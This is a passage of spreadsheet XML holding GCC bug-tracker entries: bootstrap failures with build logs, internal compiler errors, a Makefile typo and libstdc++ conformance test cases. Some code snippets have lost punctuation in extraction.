after issuing loads of errors ICEs with
Internal compiler error: Error reporting routines re-entered.
This is delta reduced from https://bugzilla.redhat.com/show_bug.cgi?id=738516
which ICEs both on the 4.6 branch and on the trunk the same way.</t>
  </si>
  <si>
    <t>GCC-50778</t>
  </si>
  <si>
    <t>[4.7 Regression] Bootstrap failure on powerpc-apple-darwin9</t>
  </si>
  <si>
    <t>Bootstrap fails on powerpc-apple-darwin9 since revision 180086 (see http://gcc.gnu.org/ml/gcc-regression/2011-10/txt00032.txt ). This failure has been fixed by revision 180090 but regress then fails with
libtool: compile:  /Users/regress/tbox/native/build/./gcc/xgcc -shared-libgcc -B/Users/regress/tbox/native/build/./gcc -nostdinc++ -L/Users/regress/tbox/native/build/powerpc-apple-darwin9.8.0/ppc64/libstdc++-v3/src -L/Users/regress/tbox/native/build/powerpc-apple-darwin9.8.0/ppc64/libstdc++-v3/src/.libs -B/Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/bin/ -B/Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/lib/ -isystem /Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/include -isystem /Users/regress/tbox/objs/powerpc-apple-darwin9.8.0/sys-include -m64 -DHAVE_CONFIG_H -I. -I/Users/regress/tbox/svn-gcc/libjava -I./include -I./gcj -I/Users/regress/tbox/svn-gcc/libjava -Iinclude -I/Users/regress/tbox/svn-gcc/libjava/include -I/Users/regress/tbox/svn-gcc/libjava/classpath/include -Iclasspath/include -I/Users/regress/tbox/svn-gcc/libjava/classpath/native/fdlibm -I/Users/regress/tbox/svn-gcc/libjava/../boehm-gc/include -I../boehm-gc/include -I/Users/regress/tbox/svn-gcc/libjava/libltdl -I/Users/regress/tbox/svn-gcc/libjava/libltdl -I/Users/regress/tbox/svn-gcc/libjava/.././libjava/../libgcc -I/Users/regress/tbox/svn-gcc/libjava/../zlib -I/Users/regress/tbox/svn-gcc/libjava/../libffi/include -I../libffi/include -fno-rtti -fnon-call-exceptions -fdollars-in-identifiers -Wswitch-enum -D_FILE_OFFSET_BITS=64 -Wextra -Wall -D_GNU_SOURCE -DPREFIX=\/Users/regress/tbox/objs\ -DTOOLEXECLIBDIR=\/Users/regress/tbox/objs/lib/ppc64\ -DJAVA_HOME=\/Users/regress/tbox/objs\ -DBOOT_CLASS_PATH=\/Users/regress/tbox/objs/share/java/libgcj-4.7.0.jar\ -DJAVA_EXT_DIRS=\/Users/regress/tbox/objs/share/java/ext\ -DGCJ_ENDORSED_DIRS=\/Users/regress/tbox/objs/share/java/gcj-endorsed\ -DGCJ_VERSIONED_LIBDIR=\/Users/regress/tbox/objs/lib/ppc64/gcj-4.7.0-13\ -DPATH_SEPARATOR=\:\ -DECJ_JAR_FILE=\\ -DLIBGCJ_DEFAULT_DATABASE=\/Users/regress/tbox/objs/lib/ppc64/gcj-4.7.0-13/classmap.db\ -DLIBGCJ_DEFAULT_DATABASE_PATH_TAIL=\gcj-4.7.0-13/classmap.db\ -fno-omit-frame-pointer -g -O2 -m64 -MT prims.lo -MD -MP -MF .deps/prims.Tpo -c /Users/regress/tbox/svn-gcc/libjava/prims.cc  -fno-common -DPIC -o .libs/prims.o
In file included from /Users/regress/tbox/svn-gcc/libjava/prims.cc:36:0:
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1235:3: error: expected '' at end of member declaration
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1237:37: error: ISO C++ forbids declaration of 'SetEventNotificationMode' with no type [-fpermissive]
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1247:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1250:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1253:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1256:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1259:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1262:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1265:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1273:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1276:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1280:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1284:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1288:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1299:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1302:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1305:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1312:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1315:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1319:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1323:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1327:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1331:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1335:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1339:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1343:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1347:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1351:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1355:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1358:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1361:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1364:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1367:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1370:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1373:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1376:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1379:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1382:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1385:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1388:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1391:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1394:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1397:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1400:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1404:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1407:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1410:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1413:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1417:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1421:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1429:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1432:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1435:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1438:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1441:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1445:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1452:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1459:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1463:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1467:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1474:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1479:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1482:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1485:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1488:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1492:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1500:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1507:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1514:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1517:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1520:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1523:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1531:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1534:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1538:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1541:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1544:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1551:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1555:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1560:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1565:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1573:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1582:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1585:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1588:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1596:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1599:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1602:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1605:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1614:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1625:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1633:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1642:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1650:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1653:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1656:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1660:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1663:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1667:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1671:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1678:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1681:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1684:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1687:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1690:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1693:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1696:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1699:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1702:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1705:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1708:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1711:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1714:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1717:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1720:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1723:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1726:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1729:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1732:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1735:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1738:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1741:3: error: 'jvmtiError' does not name a type
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h: In member function 'int _Jv_JVMTIEnv::SetEventNotificationMode(jvmtiEventMode jvmtiEvent jthread ...)':
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1241:16: error: expected '' before 'result'
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1242:31: warning: statement has no effect [-Wunused-value]
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1244:12: error: 'result' was not declared in this scope
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h: At global scope:
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1235:14: warning: unused parameter 'mode' [-Wunused-parameter]
/Users/regress/tbox/svn-gcc/libjava/classpath/include/jvmti.h:1235:14: warning: unused parameter 'event_type' [-Wunused-parameter]
(see http://gcc.gnu.org/regtest/HEAD/native-lastbuild.txt.gzip ).
My own bootstrap does not go that far and fails with
/bin/sh ./libtool  --tag=CC   --mode=compile /opt/gcc/darwin_buildw/./gcc/xgcc -B/opt/gcc/darwin_buildw/./gcc/ -B/opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/bin/ -B/opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/lib/ -isystem /opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/include -isystem /opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/sys-include    -DHAVE_CONFIG_H -I. -I../../../work/libgfortran  -iquote../../../work/libgfortran/io -I../../../work/libgfortran/../gcc -I../../../work/libgfortran/../gcc/config  -I../.././gcc  -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -fcx-fortran-rules -ffunction-sections -fdata-sections  -g -O2 -MT write.lo -MD -MP -MF .deps/write.Tpo -c -o write.lo `test -f 'io/write.c' || echo '../../../work/libgfortran/'`io/write.c
libtool: compile:  /opt/gcc/darwin_buildw/./gcc/xgcc -B/opt/gcc/darwin_buildw/./gcc/ -B/opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/bin/ -B/opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/lib/ -isystem /opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/include -isystem /opt/gcc/gcc4.7w/powerpc-apple-darwin9.8.0/sys-include -DHAVE_CONFIG_H -I. -I../../../work/libgfortran -iquote../../../work/libgfortran/io -I../../../work/libgfortran/../gcc -I../../../work/libgfortran/../gcc/config -I../.././gcc -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -fcx-fortran-rules -ffunction-sections -fdata-sections -g -O2 -MT write.lo -MD -MP -MF .deps/write.Tpo -c ../../../work/libgfortran/io/write.c  -fno-common -DPIC -o .libs/write.o
In file included from ../../../work/libgfortran/io/write.c:63:0:
../../../work/libgfortran/io/write_float.def:946:1: warning: 'static' is not at beginning of declaration [-Wold-style-declaration]
../../../work/libgfortran/io/write_float.def:946:1: error: two or more data types in declaration specifiers
../../../work/libgfortran/io/write_float.def:1016:1: warning: 'static' is not at beginning of declaration [-Wold-style-declaration]
../../../work/libgfortran/io/write_float.def:1016:8: error: two or more data types in declaration specifiers
../../../work/libgfortran/io/write_float.def:1017:1: error: storage class specified for parameter 'write_float'
../../../work/libgfortran/io/write_float.def:1019:1: error: expected '' '' or ')' before '{' token
../../../work/libgfortran/io/write_float.def:647:1: warning: 'write_infnan' defined but not used [-Wunused-function]
../../../work/libgfortran/io/write_float.def:937:1: warning: 'output_float_FMT_G_4' defined but not used [-Wunused-function]</t>
  </si>
  <si>
    <t>GCC-23546</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ICE in for_each_index at tree-ssa-loop-im.c:202</t>
  </si>
  <si>
    <t>When compiling xorg-cvs gcc throws the following ICE in 
programs/Xserver/fb/fbmmx.c  
fbmmx.c: In function 'mmxCombineAddU':  
fbmmx.c:564: internal compiler error: in for_each_index at  
tree-ssa-loop-im.c:202  
gcc (GCC) 4.0.2 20050823 (prerelease)  
Configured with: ../gcc-4.0-20050824/configure --prefix=/usr  
--libexecdir=/usr/lib --enable-shared --enable-threads=posix  
--enable-__cxa_atexit --enable-clocale=gnu --enable-languages=cc++  
Condensed command line:  
gcc -c -O2 -march=pentium4 fbmmx.i 
Compiling the file without -O2 works. 
As the preprocessed file is very long I will attach it to this report instead  
of including it in the comment.</t>
  </si>
  <si>
    <t>ma1flfs</t>
  </si>
  <si>
    <t>GCC-34360</t>
  </si>
  <si>
    <t>typo gcc/ada/Makefile.in for GNU/kFreeBSD</t>
  </si>
  <si>
    <t>Perusing the file I see around line 879:
  TOOLS_TARGET_PAIRS =  \
    mlib-tgt.adb&lt;mlib-tgt-linux.adb \
    indepsw.adb&lt;indepsw-gnu.adb
I think this should be mlib-tgt-specific.adb&lt;mlib-tgt-linux.adb instead like for all other targets.  The file mlib-tgt.adb is no longer target-specific.</t>
  </si>
  <si>
    <t>GCC-18939</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] spurious relink of gcov and gcov-dump with the base compiler</t>
  </si>
  <si>
    <t>On my x86_64 system sometimes but not all the time the following happens:
$ configure --prefix=/home/guerby/work/gcc/install/install-20041211T175809
--enable-languages=c --enable-__cxa_atexit --disable-nls --enable-threads=posix
--enable-checking
$ make bootstrap
[...]
stage1/xgcc -Bstage1/
-B/home/guerby/work/gcc/install/install-20041211T175809/x86_64-unknown-linux-gnu/bin/
  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros
-Wold-style-definition -Werror -fno-common   -DHAVE_CONFIG_H  gcov.o intl.o
version.o errors.o ../libcpp/libcpp.a   ../libiberty/libiberty.a -o gcov
stage1/xgcc -Bstage1/
-B/home/guerby/work/gcc/install/install-20041211T175809/x86_64-unknown-linux-gnu/bin/
  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros
-Wold-style-definition -Werror -fno-common   -DHAVE_CONFIG_H  gcov-dump.o
version.o errors.o ../libcpp/libcpp.a   ../libiberty/libiberty.a -o gcov-dump
[...]
stage2/xgcc -Bstage2/
-B/home/guerby/work/gcc/install/install-20041211T175809/x86_64-unknown-linux-gnu/bin/
  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros
-Wold-style-definition -Werror -fno-common   -DHAVE_CONFIG_H  gcov.o intl.o
version.o errors.o ../libcpp/libcpp.a   ../libiberty/libiberty.a -o gcov
stage2/xgcc -Bstage2/
-B/home/guerby/work/gcc/install/install-20041211T175809/x86_64-unknown-linux-gnu/bin/
  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros
-Wold-style-definition -Werror -fno-common   -DHAVE_CONFIG_H  gcov-dump.o
version.o errors.o ../libcpp/libcpp.a   ../libiberty/libiberty.a -o gcov-dump
[...]
make[2]: Entering directory `/home/guerby/work/gcc/build/build-20041211T175809/gcc'
gcc   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes  -fno-common   -DHAVE_CONFIG_H  gcov.o intl.o version.o
errors.o ../libcpp/libcpp.a   ../libiberty/libiberty.a -o gcov
gcc   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes  -fno-common   -DHAVE_CONFIG_H  gcov-dump.o version.o
errors.o ../libcpp/libcpp.a   ../libiberty/libiberty.a -o gcov-dump
[...]
gcov and gcov-dump are relinked with the base compiler which seems wrong.
As explained in http://gcc.gnu.org/ml/gcc/2004-12/msg00106.html
when ada is enabled gnat1drv relink with the base compiler is retried
which leads to a bootstrap failure.
This never happened before 20041120.
Is anyone seeing this? Just grep your build log with:
$ cat log|grep gcov|grep libi
and look at the last lines.</t>
  </si>
  <si>
    <t>GCC-628</t>
  </si>
  <si>
    <t>Internal compiler error 980711 when compiling Visibroker generated code.</t>
  </si>
  <si>
    <t>Compiler fails with error message
  Internal compiler error 980711.
Release:
egcs-2.91.66
Environment:
Linux kraak 2.2.10 #11 Sat Feb 12 01:36:25 EET 2000 i686 unknown
How-To-Repeat:
Open tar file in appendix enter dir gnat and say
  make xxx.o
xxx.o: Only includes headers
*h:    Visibroker generated header and manually written
       headers
vb:    Visibroker standard include headers
makefile: adds a -I directive</t>
  </si>
  <si>
    <t>hans.sandvall</t>
  </si>
  <si>
    <t>GCC-68210</t>
  </si>
  <si>
    <t>nothrow operator fails to call default new</t>
  </si>
  <si>
    <t>A recent discussion about operator new (https://gcc.gnu.org/ml/gcc-patches/2015-11/msg00192.html) revealed that the libstdc++ implementation of the nothrow overload of the operator doesn't conform to the requirement to return a pointer obtained as if acquired from the (possibly replaced) ordinary version.  The test case below illustrates some of the problems.
The requirement quoted above implies that a conforming implementation of the nothrow overload must call the ordinary form like so:
void* operator new (size_t n const nothrow_t&amp;) {
    try {
        return operator new (n)
    }
    catch (...) {
        return 0
    }
}
$ cat t.cpp &amp;&amp; ~/bin/gcc-5.1.0/bin/g++ -Wall t.cpp &amp;&amp; ./a.out 
#include 
#include 
#include 
struct MyBadAlloc: std::bad_alloc { }
static bool new_fail
static bool bad_alloc_thrown
static unsigned new_called
static unsigned new_handler_called
static void new_handler ()
{
    if (new_handler_called++)
        throw MyBadAlloc ()
}
void* operator new (size_t n)
{
    static size_t cntr
    ++new_called
    for (   ) {
        if (void *p = new_fail ? 0 : malloc (n + sizeof n)) {
            *static_cast(p) = ++cntr
            return static_cast(p) + 1
        }
        if (std::new_handler h = std::set_new_handler (0)) {
            std::set_new_handler (h)
            h ()
        }
        else {
            bad_alloc_thrown = true
            throw MyBadAlloc ()
        }
    }
}
void operator delete (void *p)
{
    if (p)
        free (static_cast(p) - 1)
}
int main ()
{
    new_called = 0
    void *p = operator new (1 std::nothrow)
    assert (p != 0)
    assert (1 == new_called)
    std::set_new_handler (new_handler)
    new_fail = true
    try {
        p = operator new (1 std::nothrow)
    }
    catch (...) {
        assert (!nothrow operator new threw)
    }
    assert (0 == p)
    assert (2 == new_handler_called)
    assert (bad_alloc_thrown)
}
a.out: t.cpp:53: int main(): Assertion `1 == new_called' failed.
Aborted (core dumped)</t>
  </si>
  <si>
    <t>GCC-35637</t>
  </si>
  <si>
    <t>[4.3 Regression] tr1::function fails with const member function pointer</t>
  </si>
  <si>
    <t>The following program fails under GCC 4.3.0 in pedantic mode but works under 4.2.3.
#include 
struct S
{
	void F() const {}
}
int main()
{
	std::tr1::function a( // doesn't work
	std::tr1::function b(std::mem_fun( // works
}
g++ -c -pedantic test.cpp
...
c:/devel/mingw/lib/gcc/../../include/c++/4.3.0/tr1_impl/type_traits:320: error:
ignoring 'const' qualifiers added to function type 'void ()()const'
I think the problem has to do with the way the signature gets decomposed.  It starts off as void(S::*)()const.  Next tr1::is_member_function_pointer removes S::* yielding void()()const.  Finally tr1::is_function calls remove_cv which produces the above error.</t>
  </si>
  <si>
    <t>GCC-12537</t>
  </si>
  <si>
    <t>[3.3/3.4? Regression] g++ generates writeable text sections</t>
  </si>
  <si>
    <t>toolchain:~ $ /home/toolchain/obj33/obj-gcc/gcc/xgcc -shared-libgcc -B/home/toolchain/obj33/obj-gcc/gcc/ -nostdinc++ -L/home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/src -L/home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/src/.libs -B/home/toolchain/gcc33/powerpc-unknown-linux-gnu/bin/ -B/home/toolchain/gcc33/powerpc-unknown-linux-gnu/lib/ -isystem /home/toolchain/gcc33/powerpc-unknown-linux-gnu/include -msoft-float -fPIC -mstrict-align -I/home/toolchain/gcc-3_3-branch/libstdc++-v3/../gcc -I/home/toolchain/gcc-3_3-branch/libstdc++-v3/../include -I/home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/include/powerpc-unknown-linux-gnu -I/home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/include -I/home/toolchain/gcc-3_3-branch/libstdc++-v3/libsupc++ -O1 -fsigned-char -g -Wall -fmessage-length=0 -D_GNU_SOURCE -msoft-float -fPIC -mstrict-align -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -c 